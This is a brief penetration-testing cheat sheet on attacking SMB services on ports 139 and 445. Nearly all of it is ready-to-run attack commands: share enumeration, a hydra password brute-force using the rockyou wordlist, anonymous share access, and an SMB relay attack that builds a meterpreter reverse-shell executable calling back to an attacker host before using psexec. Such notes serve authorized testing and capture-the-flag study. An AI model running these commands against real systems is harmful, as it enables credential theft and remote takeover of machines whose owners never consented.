Neko

139/445 SMB

Home of many vulnerabilities usually leading to compromise. We'll cover automated and basic manual enumeration and the transfer of files.

Last updated: May 4th, 2023

Automated Recon

nmap --script="smb*" -p 139,445 x.x.x.x
enum4linux -A x.x.x.x

Brute Force

hydra -t 4 -l username -P /usr/share/wordlists/rockyou.txt -vV x.x.x.x smb

Listing Shares

smbmap -H x.x.x.x
smbclient -N -L //x.x.x.x

Connecting

smbclient -N //x.x.x.x/share
smbclient -U user -P pass //x.x.x.x.share
mount -t cifs //x.x.x.x/sharename /mnt/smb -o guest

#smbrelay attack
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port -f exe -o file_name.exe
smbrelayx -h x.x.x.x -e badexe.exe #use generated exe from above
psexec "<user>"@<ip> -
#meterpreter
use smb_login